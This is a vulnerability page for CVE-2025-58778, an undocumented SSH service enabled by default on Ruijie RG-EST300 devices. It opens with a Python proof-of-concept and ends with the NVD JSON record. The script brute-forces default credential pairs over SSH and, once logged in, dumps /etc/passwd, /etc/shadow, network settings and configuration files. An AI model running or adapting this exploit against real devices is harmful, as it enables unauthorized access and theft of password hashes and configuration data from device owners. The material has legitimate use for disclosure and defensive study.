CVE-2025-58778

# CVE-2025-58778 - Ruijie RG-EST300 Undocumented SSH Service Exploitation # This PoC demonstrates SSH connection to the affected device using known credentials import paramiko import socket import sys import time def check_ssh_service(host, port=22, timeout=5): """Check if SSH service is running on the target device""" try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(timeout) sock.connect((host, port)) banner = sock.recv(1024) sock.close() if b'SSH' in banner: print(f"[+] SSH service detected on {host}:{port}") print(f"[+] Banner: {banner.decode().strip()}") return True return False except Exception as e: print(f"[-] Error checking SSH service: {e}") return False def exploit_ssh_access(host, port, username, password): """Attempt SSH login with known credentials""" client = paramiko.SSHClient() client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) try: print(f"[*] Attempting SSH login to {host}:{port} with {username}:{password}") client.connect(host, port=port, username=username, password=password, timeout=10) print("[+] Login successful! Executing system commands...") # Execute information gathering commands commands = [ 'cat /etc/passwd', 'cat /etc/shadow', 'ifconfig', 'cat /proc/version', 'find / -name "*.conf" 2>/dev/null', 'cat /etc/config/* 2>/dev/null' ] for cmd in commands: print(f"\n[*] Executing: {cmd}") stdin, stdout, stderr = client.exec_command(cmd) output = stdout.read().decode() print(output[:500]) client.close() return True except paramiko.AuthenticationException: print("[-] Authentication failed") return False except Exception as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": target_host = sys.argv[1] if len(sys.argv) > 1 else "192.168.1.1" ssh_port = 22 # Common default credentials for Ruijie devices credentials = [ ("admin", "admin"), ("admin", "ruijie"), ("admin", "password"), ("root", "root"), ("admin", ""), ] print(f"[*] Targeting Ruijie RG-EST300 device at {target_host}") if check_ssh_service(target_host, ssh_port): for username, password in credentials: if exploit_ssh_access(target_host, ssh_port, username, password): print(f"\n[!] Successfully exploited CVE-2025-58778 with credentials: {username}/{password}") break time.sleep(1) else: print("[-] SSH service not detected on target")

{"cve": {"id": "CVE-2025-58778", "sourceIdentifier": "[email protected]", "published": "2025-10-16T06:15:37.533", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [{"sourceIdentifier": "[email protected]", "tags": ["unsupported-when-assigned"]}], "descriptions": [{"lang": "en", "value": "Multiple versions of RG-EST300 provided by Ruijie Networks provide SSH server functionality. It is not documented in the manual, and enabled in the initial configuration. Anyone with the knowledge of the related credentials can log in to the affected device, leading to information disclosure, altering the system configurations, or causing a denial of service (DoS) condition."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-912"}]}], "references": [{"url": "https://jvn.jp/en/jp/JVN72648885/", "source": "[email protected]"}, {"url": "https://www.ruijie.com.cn/gy/xw-aqtg-gw/929848/", "source": "[email protected]"}, {"url": "https://www.ruijie.com/en-global/support/productLifecycle", "source": "[email protected]"}]}}